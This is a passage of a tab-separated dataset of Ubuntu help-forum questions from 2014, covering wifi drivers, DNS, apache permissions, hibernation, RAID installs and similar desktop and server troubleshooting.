/usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 372 , in _append_banner_ads scagent.query_exhibits ( ) file `` /usr/share/software-center/softwarecenter/backend/scagent.py '' , line 119 , in query_exhibits lang=get_language ( ) , series=self.distro.get_codename ( ) ) file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 92 , in get_codename self._distro_code_name = distro_info [ 'codename ' ] keyerror : 'codename' i tried several suggestions from other forum posts such as reinstalling the software center , but so far nothing has helped . i hope someone can help me with this . thank you in advance .
517660	setting up a tracker with opentracker	i 'm trying to run my tracker for the first time . i 'd followed the instructions on ( https : //erdgeist.org/arts/software/opentracker/ ) and when i run ./opentracker it seems to be working ( no error or anything promtped ) . but when i try the following ( so i can set my ip address and start the server ) : ./opentracker.debug -i 190.18.43.148 -p 6969 i get the following error : binding socket type tcp to address [ 190.18.43.148 ] :6969 ... socket_bind6_reuse : can not assign requested address would you let me know what am i doing wrong ? thanks ! !
517661	unable to connect to wireless networks	i have installed ubuntu 14 and i updated it once after that i have n't been able to use or connect to any wifi netwotks . help me out
517663	symbolic link to resolv.conf strange behaviour in ubuntu 14.04	i recently upgraded my pc to ubuntu 14.04 . i then experienced major problem in dns resolution that did not work anymore . i finally found the following : in /etc , there is a 'resolv.conf ' wihich is a symbolic link to ../run/resolvconf.resolv.conf . on my system this is an empty file . however , '/run/resolvconf/resolv.conf ' is there . i manually reated the symbolic link to /run/resolvconf/resolv.conf . that works perfectly . howevrer the original link does not work . to illustrate this , i created two symbolic links in '/etc ' : marc @ marc-vostro-420-series : /etc $ ls -irl dns . * 787036 lrwxrwxrwx 1 root root 27 ao没 29 17:50 dns.ok - > /run/resolvconf/resolv.conf 787080 lrwxrwxrwx 1 root root 29 ao没 29 17:51 dns.nok - > ../run/resolvconf/resolv.conf marc @ marc-vostro-420-series : /etc $ cat dns.ok # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.1.1 marc @ marc-vostro-420-series : /etc $ cat dns.nok marc @ marc-vostro-420-series : /etc $ as you see , the second one is empty . now , the question : why is the original symlink pointing to the '../ ' ( wrong ) version ?
517665	how to i get the right pulseaudio profiles to show up without restarting pulseaudio ?	some times my usb headset microphone disappears from my list of input devices . reconnecting the headset does n't work , but killing pulseaudio does : pulseaudio -k when pulseaudio starts back up , my usb headset shows up both under input and output devices and works fine . the problem is that killing pulseaudio also crashes all applications using it , or leaves them without sound . this means that i have to restart skype , steam , xchat , any running video player ( smplayer crashes ) , any running games etc . is there a way to force reload all devices without killing the running instance of pulseaudio ? interestingly , when i get my usb headset to work by restarting pulseaudio , reconnecting the headset will cause only the output device to show up . i have to restart pulseaudio again with the headset connected to get the input device to show up . edit : checked pavuvontrol under `` configuration '' : after restarting pulseaudio , an additional profile ending with `` + digital stereo input '' ( or something like that ) is available in the list and selected by default .
517669	how to create dconf site setting file to disable all super key assignments	the site https : //wiki.gnome.org/projects/dconf/systemadministrators indicates that there is a method to install a single file to override the defaults provided with gnome in a proper manner from an administrator 's point of view . in particular , i want to set up a /etc/dconf/db/site.d/00_site_settings file so that all value entries in the path org.gnome.desktop.wm.keybindings have all references to `` super '' removed . [ i.e . the windows/super_key values deleted ] it would solve update issues where the value portion of each pair gets overwritten by an update or a console login - thereby causing vnc clients major problems with their `` s '' and `` h '' keys after `` super '' reappears ... ( i manually searched with dconf editor and think this might handle it . please comment if you can think of an automated , scripted method ... thanks ... ) # /etc/dconf/db/gdm.d/10-nosuperkey-settings # # this file is a site config file to disable `` super/windows '' key bindings # so that vnc clients can operate properly . # # use `` dconf update '' to incorporate into db the first time # [ org/gnome/desktop/wm/keybindings ] maximize= '' minimize= '' move-to-workspace-down= [ ' < control > < shift > < alt > down ' ] move-to-workspace-up= [ ' < control > < shift > < alt > up ' ] panel-main-menu= [ ' < alt > f1 ' ] switch-applications= [ ' < alt > tab ' ] switch-group= [ ' < alt > above_tab ' ] switch-input-source= '' switch-input-source-backward= '' switch-to-workspace-down= [ ' < control > < alt > down ' ] switch-to-workspace-up= [ ' < control > < alt > up ' ] unmaximize= [ ' < alt > f5 ' ]
517671	install windows 7 and ubuntu on the same partition	i was wondering if i could install windows 7 and ubuntu on the same hard drive partition.. when i select `` install ubuntu alongside windows `` it creates another partition to install ubuntu int ... but what i want is to install ubuntu in the same partition as that of windows.. after searching he whole internet i 'm starting to think that it 's not possible as there will be a confliction between windows and ubuntu boot-loader ... but i 'm not sure about that.. there is this post here but it does n't fit to my situation.. thanks !
517677	how to get a colored bash ?	how to get the bash colored like this ?
517679	missing menu bar 14.04	i have been using ubuntu 14.04 for some time without problems . however my menu bar has just disappeared and i can not access any applications . my wallpaper and documents on the desktop appear and when i go to a guest session the menu bar appears and ubuntu works perfectly . i get an error message upon opening which reads : could not apply stored configuration for monitors . error on line 1 char 1 document empty or white noise . i have thought about simply reloading my saved files into a new user but do not want to waste so much disk space . i assume i have a corrupted configuration file and wondered about simply copying this from one of the working users into my setup . however , i do n't know which file this is likely to be this should be easy to identify as it will be empty ! can anyone help ? many thanks
517682	purevpn connects but very slow	so i 've a purevpn connection working great in windows . but when i try to use it in latest ubuntu 14.04.1 lts , it using pptp , connects for a minute , offers no internet service , and then disconnects using openvpn , connects but is extremely slow using sstp , connects but is extremely slow i tried contacting purevpn support and all they offered me to toggle different settings , switch servers , try tcp or udp in openvpn and see if things get better ; which all sound like not-so-great tech support of a vpn company . they seemed like just trying to get through the chat session . i 've tried numerous solutions found online but none worked . i 've tried command line configuration and gui cofiguration , none worked . the only thing holding me back from completely switching to ubuntu is this vpn issue . i hope it 'll get it resolved using stackexchange 's amazing communities help : ) i know this is not an active site like stackoverflow but i 'm still asking ( which shows the level of desperation i 'm having lol ) p.s . i 'm not a regular linux user ( trying to switch from windows )
517683	laptop does n't hibernate when i close the lid in ubuntu 14.04	ok , i know there already are several questions related to this . i tried many solutions to no avail . i 'm going to detail here what i did and how are my config files in the hope that a good soul will point out what i missed . some initial information : i installed ubuntu 14 from a 14.01 .iso and it became a 14.04 because , i guess , i checked an option to update automatically during the install . i have an external monitor attached . this seems to be relevant in some cases . as explaned here , there is no option to make the pc hibernate in the power settings of ubuntu 14 . only suspend and do nothing . pm-hibernate works fine . my swap is slightly larger than my ram 1 . i had a mint ( 14 if i 'm not mistaken ) where closing the lid would not hibernate until i added some scripting . in ubuntu 14 there is no /etc/acpi/lid.sh that i can edit as i did in mint . i tried to create one with the following contents : echo 'ok ' > ok grep -q closed /proc/acpi/button/lid/*/state if [ $ ? = 0 ] then su - gabriel -c 'dconf read /org/gnome/settings-daemon/plugins/power/lid-close-ac-action ' | grep hibernate if [ $ ? = 0 ] then pm-hibernate fi fi the file ok is not created when i close the lid , this means the script is never called . i tried to move lid.sh into events/ . as suggested here , i tried to rename it to lid.sh.post and to move it to /etc/acpi/local/ , and other several combinations of directory and names ( with/without .post , in /etc/acpi/ , local/ , events/ ... ) 2 . i did as told here and installed gnome-tweak-tool , so i could set the action on closed lid to hibernate . after i did , the dropdowns in the control panel / power were blank ( not suspend nor 'do nothing ' ) , but now they show 'do nothing ' again , i do n't know what i did to change that . and running su - gabriel -c 'dconf read /org/gnome/settings-daemon/plugins/power/lid-close-ac-action' still returns 'nothing ' , which compromises my ( probably useless anyway ) script . 3 . i did as told here : edited /etc/systemd/logind.conf and set handlelidswitch to 'hibernate ' : cat /etc/systemd/logind.conf | grep -i lid # handlelidswitch=hibernate # lidswitchignoreinhibited=yes i also tried with # lidswitchignoreinhibited=no 4 . as explained here and here , i edited /var/lib/polkit-1/localauthority/50-local.d/com.ubuntu.enable-hibernate.pkla : root @ gabriel-linux : /var/lib/polkit-1/localauthority/50-local.d # cat com.ubuntu.enable-hibernate.pkla [ re-enable hibernate by default in upower ] identity=unix-user : * action=org.freedesktop.upower.hibernate resultactive=yes [ re-enable hibernate by default in logind ] identity=unix-user : * action=org.freedesktop.login1.hibernate resultactive=yes
517684	maas add node failing	i am trying to install openstack using maas and juju but i ca n't get any nodes added into the maas system . i am doing this all on top of vmware vsphere 5.1 . i have created the maas server with 4 nics . 1 nic is on my management network to allow me web access to maas from my laptop and it is on a 10.10.10.0/24 network . 1 nic is on a dedicated network setup for openstack management and is on 10.10.100.0/24 network . the other nics are not configured . i have added the 10.10.100.0/24 interface into maas and set it to manage dhcp and dns . my boot images have been downloaded . when i fire up a new vm on the 10.10.100.0/24 network , it does pxe boot , configures network access properly , but then fails with util.py [ warning ] : failed acccessing user data message . i ca n't figure it out . could it be that the pre-seed metadata value is 10.10.10.200 instead of being on the 10.10.100.0 network ? thanks for your help , justin
517685	force quit panel applet freezes gnome	i have used the `` force quit '' panel applet for ages , with gnome and mate . but recently , ( several months ) when i am in gnome , the force quit applet freezes my system . the window appears saying press to exit , but it neither halts misbehaving apps , nor exits itself . to get out of it , i login to another shell , ( ctrl+alt+f5 ) and sudo service ligthdm restart in which case everything i was doing is now lost . there are some specific programs i use which i know are prone to hangs , so i wrote some panel scripts to kill them specifically , but i would rather get the force quit applet working correctly . my kernel info : $ uname -a linux gk 3.2.0-67-generic-pae # 101-ubuntu smp tue jul 15 18:04:54 utc 2014 i686 i686 i386 gnu/linux
517686	403 forbidden when changing apache2 document root	i 'm running mint 17 , and i changed my /etc/apache2/sites-available/000-default.conf file to the following : < virtualhost *:80 > # the servername directive sets the request scheme , hostname and port that # the server uses to identify itself . this is used when creating # redirection urls . in the context of virtual hosts , the servername # specifies what hostname must appear in the request 's host : header to # match this virtual host . for the default virtual host ( this file ) this # value is not decisive as it is used as a last resort host regardless . # however , you must set it for any further virtual host explicitly . # servername www.example.com serveradmin webmaster @ localhost documentroot /home/vg/www # available loglevels : trace8 , ... , trace1 , debug , info , notice , warn , # error , crit , alert , emerg . # it is also possible to configure the loglevel for particular # modules , e.g . # loglevel info ssl : warn errorlog $ { apache_log_dir } /error.log customlog $ { apache_log_dir } /access.log combined # for most configuration files from conf-available/ , which are # enabled or disabled at a global level , it is possible to # include a line for only one particular virtual host . for example the # following line enables the cgi configuration for this host only # after it has been globally disabled with `` a2disconf '' . # include conf-available/serve-cgi-bin.conf < /virtualhost > # vim : syntax=apache ts=4 sw=4 sts=4 sr noet the output of $ ls -al at my home directory level : drwxr-xr-x 2 vg vg 4096 aug 29 12:44 www and inside the www directory : drwxr-xr-x 2 vg vg 4096 aug 29 12:44 . drwxr-xr-x 21 vg vg 4096 aug 29 12:43 .. -rwxrwxr-x 1 vg vg 22 aug 29 12:44 info.php when i point firefox to localhost/info.php , i get 403 , permission denied . info.php merely contains : < ? php phpinfo ( ) ; ? > any ideas ?
517695	usb enumeration stress test	i 'm creating a usb device that runs my own custom stack , and i need to make sure that it works with any host or hub . usb-if has their own official testing program , but it only runs on windows and has some serious problems on my windows machine . ( it kills all other usb devices , including my mouse and keyboard , so that i ca n't use its own ui ) is there a tool for ubuntu that can hammer a usb device as hard as the spec allows and tell me how it did ?
517696	ubuntu does not recognize ctrl key after recent upgrade	a recent system upgrade in 14.04 disabled the ctrl key in my asus k55vm-sx086d laptop . initially there was some problem where the screen used to go blank when pressing the ctrl key when i was using 13.10 , but somehow after upgrade to 14.04 it was working fine . however after the recent upgrade its not working again . i have checked the default us keyboard layout and it does not seem to recognize the two ctrl key . please help . do let me know steps that i can follow to resolve this issue . thanks .
517698	`` your current hardware enablement stack ( hwe ) is no longer supported ''	so my ubuntu wont start after updates in graphics mode and this is what i get in prompt ; your current hardware enablement stack ( hwe ) is no longer supported since 2014-08-07 . security updates for critical parts ( kernel and graphcis stack ) of your system are no longer available . for more information , please see : http : //wiki.ubuntu.com/1204_hwe_eol there is a graphics stack installed on this system . an upgrade to a supporter ( or longer supported ) configuration will become available on 2014-07-16 and can be invoked by running 'update-manager in the dash i would want to recover the pictures and music from hdd , how i do that ? is there any chance to roll back previous version of ubuntu to get it back in graphics mode ?
517699	unable to install ubuntu server 14.04 to raid 5 array on highpoint rocketraid 3620	i recently purchased a highpoint rocketraid 3620 to bypass the horrible intel controller on my asus p6t deluxe v2 motherboard . i currently have three 1tb drives attached to the card currently not in an array ( which will later be used to create a raid 5 array for media and file server use ) along with three 500gb drives in a raid 5 array for my system install drive . the current iso apparently does n't have support for this hardware raid card , because the install wo n't recognize the array or the individual drives at all . highpoint supplies the source code for updated drivers that will work with the current build . this should not be this difficult . there has to be some way to either load the drivers during install from a disc , package them for the kernel on the iso and create a new iso that will load them at install , or install to a spare drive ( i have a spare of the same make and model for each set of drives ) and image the system , install the drivers , then install the image onto the array and get it to boot from the array . so far i 've found bits and pieces that might help if i spent two weeks cobbling parts of one solution or another along with copius amounts of trial and error , but this is getting ridiculous . also , i have no intention of using software raid , as this card is a sas/sata hardware controller with the ability to expand raid arrays on the fly , and support up to 32 drives in a single array , which i could not do with cheap sata controllers and software raid . i intend to expand the storage array well beyond what i currently have through use of expansion cards for this raid card , some cables , and an additional server case loaded with nothing but a secondary psu and hds , wired in to power on or off along with the main server . that part is easy . i 'll be expanding to at least 12 4tb drives for the media and file storage array , but i digress . i 'm new to linux , so can someone please tell me how to get ubuntu to install to and boot from the current array using the driver/source code that highpoint provides ? as an aside , building the ability to load additional drivers during install in , as well as providing a simple program that could allow you to choose your iso ( and by extension your kernel ) , input the location of the driver source code , compile the driver , then create a new iso with the driver `` integrated '' , would be absolutely brilliant and save people , even advanced users , a ton of time , and reduce the rising numbers of balding linux users and administrators .
517703	how to install ubuntu 14.04 on uefi laptop ?	i have sony vaio e15125cnw . it have windows 8 preinstalled on uefi . i want to dual-boot with ubuntu . how can i install ubuntu 14.04 lts 64-bit on uefi ?
517705	ralink rt3290 wifi drops every 5 minutes	i have hp pavilion g6-2201ax laptop . after a year or so i could install a good driver for my wireless device . help with the rt3290 wireless adapter . now connection is good and strong . but new problem is that wifi drops every 5 minutes . i have to reconnect it everytime . please help . i have disabled 802.11n also tried wicd network manager . nothing helps .
517706	how to automate custom ubuntu 14.04 build and test that all services are running	i have been trying to figure out , and was hoping you may be able to share some tips , for how to automate the creation of and setup ( e.g . answer the questions during installation ) of a virtual machine within with a custom ubuntu 14.04 build on it . our build process outputs an iso file , so we would like to have the installation install from this iso . once it has successfully installed , we would then like to automate testing to ensure that the services we have setup are all running after installation . what tools or software should i look at for automating this type of behavior ? some tools i have been looking at to see if they may work are : checkbox â https : //wiki.ubuntu.com/testing/automation/checkbox/ veewee â https : //github.com/jedi4ever/veewee thank you very much for your time and assistance . i greatly appreciate it .
517708	airmon-ng start wlan0 has no answer for interface , chipset , driver	i run ubuntu 12.04.5 on oracle vm virtualbox , when i type airmon-ng start wlan0 i get no answers for the interface chipset driver , i just started using ubuntu and i do n't know if the problem is that i run ubuntu on vm ? consequently when i type airodump-ng mon0 i get that failed : no such device .
517713	ca n't update software	i am new to linux , i have 14.04 installed , when i 'm trying to download from software center i click install and the progress bar only go 's half way across and thats it nothing happens after that . what do i do ?
517719	can not boot : “no init found . try passing init=bootarg” standard fix not working	i 'm getting the booting error as per can not boot : `` no init found . try passing init=bootarg '' i 'm run commands in a livecd terminal ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00638cbf device boot start end blocks id system /dev/sda1 63 80324 40131 de dell utility /dev/sda2 * 30801920 241535341 105366711 7 hpfs/ntfs/exfat /dev/sda3 241537022 312580095 35521537 5 extended /dev/sda5 241537024 309569535 34016256 83 linux /dev/sda6 309571584 312580095 1504256 82 linux swap / solaris ubuntu @ ubuntu : ~ $ sudo fsck -y /dev/sda1 fsck from util-linux 2.20.1 fsck.fat 3.0.26 ( 2014-03-07 ) /dev/sda1 : 82 files , 4367/20017 clusters ubuntu @ ubuntu : ~ $ sudo fsck -y /dev/sda2 fsck from util-linux 2.20.1 fsck : fsck.ntfs : not found fsck : error 2 while executing fsck.ntfs for /dev/sda2 ubuntu @ ubuntu : ~ $ sudo fsck -y /dev/sda3 fsck from util-linux 2.20.1 e2fsck 1.42.9 ( 4-feb-2014 ) fsck.ext2 : attempt to read block from filesystem resulted in short read while trying to open /dev/sda3 could this be a zero-length partition ? ubuntu @ ubuntu : ~ $ sudo fsck -y /dev/sda4 fsck from util-linux 2.20.1 e2fsck 1.42.9 ( 4-feb-2014 ) fsck.ext2 : no such file or directory while trying to open /dev/sda4 possibly non-existent device ? ubuntu @ ubuntu : ~ $ sudo fsck -y /dev/sda5 fsck from util-linux 2.20.1 e2fsck 1.42.9 ( 4-feb-2014 ) /dev/sda5 : clean , 160379/2129920 files , 1067688/8504064 blocks i got the solution from https : //www.youtube.com/watch ? v=eth3nj9oobm . when i reboot i get the same error . one thing i can think of is that i created a new livecd , maybe it needs to be the correct version ? what to do/ what more info do you need ?
517721	is it possible for ubuntu to work with mtk6572 dual core arm cortex a7 family cpu @ 1.2ghz processor in a tablet ?	is it possible for ubuntu to work with mtk6572 dual core arm cortex a7 family cpu @ 1.2ghz processor in a tablet ? as far as my research has gotten me i 've found that this cpu is x86 but i 'm not entirely sure if that 's the only thing i need to be looking for . i 'm a newby to the whole tablet scene so if you have any advice as to what other tablet hardware aspects i should be planning ahead for other than the requirements posted by ubuntu it would be greatly appreciated . if you do find a good answer can you post the link where you found this info ? it would expand my research capabilities and eliminate my need to ask these questions in the future as i came up pretty dry on the google haha .
517724	how to migrate to a bigger ssd ?	i 'd like to migrate my ubuntu 14.04 install from a smaller sdd ( 256gb ) to a bigger one ( crucial mx100 512gb ) without reinstalling . what is the best way to process ? i read that clonezilla was not appropriate to deal with the ssd alignment . more details about my install ( a full encrypted install with lvm ) : df -h filesystem size used available used % mount on /dev/mapper/rm -- work -- vg-root 23g 11g 12g 47 % / none 4,0k 0 4,0k 0 % /sys/fs/cgroup udev 7,7g 4,0k 7,7g 1 % /dev tmps 7,7g 74m 7,7g 1 % /tmp tmpfs 1,6g 1,6m 1,6g 1 % /run none 5,0m 0 5,0m 0 % /run/lock none 7,7g 764k 7,7g 1 % /run/shm none 100m 64k 100m 1 % /run/user tmpfs 4,0g 0 4,0g 0 % /var/cache/apt/archives /dev/sda1 228m 85m 132m 39 % /boot /dev/mapper/rm -- work -- vg-home 204g 189g 4,9g 98 % /home cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > /dev/mapper/aliot -- work -- vg-root / ext4 errors=remount-ro , noatime , discard 0 1 # /boot was on /dev/sdc1 during installation uuid=c15f5e23-e892-4f00-8744-2805ae304cf9 /boot ext2 defaults 0 2 /dev/mapper/aliot -- work -- vg-home /home ext4 defaults , noatime , discard 0 2 /dev/mapper/aliot -- work -- vg-swap_1 none swap sw 0 0 # tmp to ram # tmpfs /tmp tmpfs defaults , noatime , mode=1777 0 0 tmps /tmp tmpfs defaults , suid , nodev , exec 0 0 # /var/log/ to ram # tmpfs /var/log tmpfs defaults , nosuid , nodev , noatime , mode=0755 , size=5 % 0 0 # apt cache to ram tmpfs /var/cache/apt/archives tmpfs defaults , size=4g 0 0 # cache to ram tmpfs /home/rm/.cache tmpfs defaults , size=1g 0 0 sudo lvdisplay -- - logical volume -- - lv path /dev/aliot-work-vg/swap_1 lv name swap_1 vg name aliot-work-vg lv uuid ym1ljd-arxn-23na-wgs8-0ybp-ryiv-rwzy6v lv write access read/write lv creation host , time aliot-work , 2013-06-24 14:29:45 +0200 lv status available # open 2 lv size 7,86 gib current le 2013 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:1 -- - logical volume -- - lv path /dev/aliot-work-vg/root lv name root vg name aliot-work-vg lv uuid degnqj-5koj-iw6t-fpjx-5xhy-duta-jawvly lv write access read/write lv creation host , time aliot-work , 2013-06-24 14:31:07 +0200 lv status available # open 1 lv size 23,24 gib current le 5949 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:2 -- - logical volume -- - lv path /dev/aliot-work-vg/home lv name home vg name aliot-work-vg lv uuid beexpf-nh3n-1czl-bnlp-eam3-jrpl-wtbu7u lv write access read/write lv creation host , time aliot-work , 2013-06-24 14:31:17 +0200 lv status available # open 1 lv size 207,13 gib current le 53025 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:3 so what do you advice in my particular case ? thanks in advance for your help ! : )
517735	ca n't find pvr addons in xbmc	i just upgraded my pc from xbmcbuntu 12.2 frodo to xubuntu 14.04 and installed xbmc 13.1 gotham on it . xbmc runs fine , but i ca n't find any pvr addons , in fact i do n't have any `` disabled addons '' at all , like in frodo . i have looked all over , but i ca n't find a way to add or enable any pvr client in xbmc , co uld anybody point me in the right direction ? i start here , because i know you people are the best . if i do n't get the answer here , i will start looking around on xbmc forums . thanks ! tomas
517736	installing vmware ova on amazon aws	i am trying to import a vmware ova on amazon aws but experiencing issues . after importing ( or my attempt to import ) , i can no longer access the server via ssh even though the amazon aws console shows the server as running . i have tried restarting the server a few times . any other steps that could fix this ?
517737	hash of lubuntu-14.04.1- desktop-amd64.iso	i can not find what the hash of lubuntu-desktop-14.04.1- amd64.iso is . original language commented out , but still there
517743	14.04 does not mount or play any dvd	i read so many related questions and tried so many different things , but nothing seems to work . i am really new with ubuntu/linux , and i would be so grateful if someone could help me with that . the dvd spins for a few seconds , then stops . i can not see it in the finder window , and i can not mount it . i installed a whole bunch of libdvd-things but this also does not seem to work . typing apt-cache policy ubuntu-restricted-extras gives me ubuntu-restricted-extras : installed : ( none ) candidate : 60 version table : 60 0 500 http : //at.archive.ubuntu.com/ubuntu/ trusty/multiverse amd64 packages typing apt-cache policy ubuntu-restricted-addons gives me ubuntu-restricted-addons : installed : 20 candidate : 20 version table : * 20 0 500 http : //at.archive.ubuntu.com/ubuntu/ trusty/multiverse amd64 packages 100 /var/lib/dpkg/status maybe someone can be so kind and help me out . thank you ! regards olivia
517744	hostname keeps being reverted	i 'm struggling with a strange problem on a ubuntu 14.04.1 lts vm running on azure . my hostname keeps getting reverted to something related to my azure deployment . in short : the system hostname does not equal cat /etc/hostname while /etc/hostname and /etc/hosts remain unchanged . this is my /etc/hostname dbc1mdb and this my /etc/hosts 127.0.0.1 localhost # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters ff02 : :3 ip6-allhosts 10.0.1.6 dbc1mdb 10.0.1.7 dbc1sdb1 i am really pulling my hair out . any suggestions ? update : i 'm now suspecting that either the dhcp client or the azure linux agent is messing with the hostname .
517745	lubuntu mac appearance	i have lubuntu installed on my old compaq presario v5000 computer and it runs nicely for a lightweight os , but i would like too have a mac os x style appearance . i tried a tutorial i found online but it just did n't work right . do you have any ideas or suggestions ?
517746	running unbutu operating system	i installed unbutu system and when i boot it ask for the password . it found wifi connection but after entering password the hard drive will run and screen goes black and can only see mouse cursor . is there something i should do before booting ? i stared with a formatted drive .
517756	reinstall ubuntu while maintaining contents on raid	to start , i am a complete unix newbie and went with linux to set up my htpc because i was worried about support for hardware and software raids on other platforms . for some reason when i boot my computer i get hung on a black screen with a cursor blinking but ca n't type anything . i 've tried rebooting into recovery mode and fixing any broken packages to no avail . i 'm considering wiping my hard drive that has just the os on it and reinstalling ubuntu . i have raid 5 configured on my other hard drives and i do n't want to lose the content on those . can some one point in me the right direction or confirm this is even possible ?
517763	ubuntu would n't start after installing updates , but then after a few restarts , its starting again	i 'm not sure what precise subject\title should i put for this question because it must be descriptive and short in the same time while the subject is full of details . today in the morning i installed the following updates ( latest entries in /var/log/apt/history.log ) start-date : 2014-08-29 07:52:16 commandline : aptdaemon role='role-commit-packages ' sender=':1.102' install : linux-headers-3.13.0-35 : amd64 ( 3.13.0-35.62 ) , linux-headers-3.13.0-35-generic : amd64 ( 3.13.0-35.62 ) upgrade : linux-headers-generic : amd64 ( 3.13.0.34.40 , 3.13.0.35.42 ) , multiarch-support : amd64 ( 2.19-0ubuntu6.1 , 2.19-0ubuntu6.3 ) , libc-dev-bin : amd64 ( 2.19-0ubuntu6.1 , 2.19-0ubuntu6.3 ) , libc-bin : amd64 ( 2.19-0ubuntu6.1 , 2.19-0ubuntu6.3 ) , libc6 : amd64 ( 2.19-0ubuntu6.1 , 2.19-0ubuntu6.3 ) , libc6 : i386 ( 2.19-0ubuntu6.1 , 2.19-0ubuntu6.3 ) , usb-creator-common : amd64 ( 0.2.56.1 , 0.2.56.2 ) , libc6-i386 : amd64 ( 2.19-0ubuntu6.1 , 2.19-0ubuntu6.3 ) , usb-creator-gtk : amd64 ( 0.2.56.1 , 0.2.56.2 ) , libc6-dbg : amd64 ( 2.19-0ubuntu6.1 , 2.19-0ubuntu6.3 ) , linux-libc-dev : amd64 ( 3.13.0-34.60 , 3.13.0-35.62 ) , libc6-dev : amd64 ( 2.19-0ubuntu6.1 , 2.19-0ubuntu6.3 ) end-date : 2014-08-29 07:54:34 after that i did n't restart my laptop right away . but i suspended it ( i think twice ) , then i shut it down for sometime . when i started it again , ubuntu did n't start . i saw plymouth splash stream flashing dots as usual , but it froze after lighting 2 dots . so i restarted the machine . still , ubuntu did n't start but this time i believe i did n't reach plymouth screen , so i restarted once again . i 'm not sure how many restarts i have , but it was 3 at most . then ubuntu started ! how can the system manage to fix it self ? or did it discard the updates may be ? is it ok to suspend ubuntu after installing updates ? or should i restart the machine ?
517764	java is installed but not recognized	austin @ hp-envy-m6-notebook-pc : ~ $ java -version the program 'java ' can be found in the following packages : * default-jre * gcj-4.8-jre-headless * openjdk-7-jre-headless * gcj-4.6-jre-headless * openjdk-6-jre-headless try : sudo apt-get install < selected package > austin @ hp-envy-m6-notebook-pc : ~ $ sudo apt-get install default-jre reading package lists ... done building dependency tree reading state information ... done default-jre is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . austin @ hp-envy-m6-notebook-pc : ~ $ any suggestions ?
517766	installed 32 bit	so i am kind of new to the ubuntu thing and i installed 32 bit instead of 64 bit ( my pc has 8gb of ram , but did not realize that at the time ) . my question is should i re-install the 64-bit or live it like this ?
517767	why is n't ubuntu 14.04.1 coming out of sleep/suspend mode ?	i 've installed ubuntu multiple times ( on the same system , an hp pavilion g6 laptop ) . and every time i install it , when i close my laptop lid , it suspends , then when i come back out of suspend , the screen just stays black , and i ca n't do anything . i 've fixed this many times before , over different installations , but it is really hard to look for the same solution . the solution was basically to create an entry somewhere in the file system that forced the laptop to come back out of suspend . i do n't know what i 'm supposed to do ? how do i fix this ?
517768	backing up and restore drivers	i use a old dell inspiron ubuntu does n't come with my wireless driver by default it does recognize the ethernet connection and used to downland wireless driver using cable connection . but now i dont have access to lan and im planning to reinstall i need a way to back up my drivers and install them offline after setup how can i do it ? this is my wireless model i used lspci command to find our abut it 0c:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 )
517772	lenovo e540 rtl8723be wifi not working	i 'm really struggling to have working wifi on my laptop lenovo e540 . i googled about my network card using ubuntu , but nothing solved my problem . first of all , i installed ubuntu 14.04.1 lts 64-bit . i could use wifi , but after few minutes it would turn off and i could not connect to wifi again . so i started googling . lspci : network controller : realtek semiconductor co. , ltd. rtl8723be pcie wireless network adapter first of all , i found this thread with comment 29 to be helpful for many users having same controller as me . so i installed it and got kernel panic . i googled more . found kozak127 's edited rtl8723be . tried it , got kernel panic . here is suggested to use older kernel . no differece there for me . my kernel : 3.13.0-35-generic so my question is : is there a way to get this realtek controller working ? how ? offtopic : i bought a new laptop , so i would have less problems than i had with lenovo n500 and ubuntu . is there a brand that works great with linux ? i looked up lenovo n540 and linux compatibility and no problems were reported there . edit 1 : /etc/modprobe.d/rtl8723be.conf /lib/modules/3.13.0-32-generic/kernel/drivers/net/wireless/rtlwifi/rtl8723be /lib/modules/3.13.0-32-generic/kernel/drivers/net/wireless/rtlwifi/rtl8723be/rtl8723be.ko /usr/src/linux-headers-3.13.0-32/drivers/net/wireless/rtlwifi/rtl8723be /usr/src/linux-headers-3.13.0-32/drivers/net/wireless/rtlwifi/rtl8723be/makefile /usr/src/linux-headers-3.13.0-32-generic/include/config/rtl8723be.h /usr/src/linux-headers-3.13.0-35/drivers/net/wireless/rtlwifi/rtl8723be /usr/src/linux-headers-3.13.0-35/drivers/net/wireless/rtlwifi/rtl8723be/makefile /usr/src/linux-headers-3.13.0-35-generic/include/config/rtl8723be.h
517773	ubuntu 14.04.1 persistent on usb flash drive deleted windows 7	i installed ubuntu 14.04.1 persistent on a usb flash drive using linux live usb creator http : //www.linuxliveusb.com/ and everything went fine . i gave it persistent memory for the flash drive to store changes . once i booted up from the drive , it took a long time to boot up and after it booted , i clicked live mode so it would n't affect my computer . after that , i could n't access windows files or anything so i then restarted it and went to bios settings and let it boot from windows . when it boots , it does nothing ! nothing works and not even the hp recovery manager that came with my computer does n't boot up ! i then decided to boot from the usb again to ubuntu and i went to the hard drive and it says only `` 1 gig '' of space used ! i had a bunch of videos and files on windows that i need ! please help ! if there is no way to get windows back or my files , is there at least a way recover my files such as photos , music , and videos because it appears there is nothing on the hhd ! here goes a picture of my here is a picture of gparted https : //imageshack.com/i/ey4abbo3j
517774	where can i find statistics on package downloads and dependencies ?	is there a site that lists ( or ranks ) ubuntu/debian packages by downloads or dependency count ? the node.js package manager npm has leaderboards , as does pypi ( unofficially ) . it 'd be interesting to see which packages are used and downloaded most often .
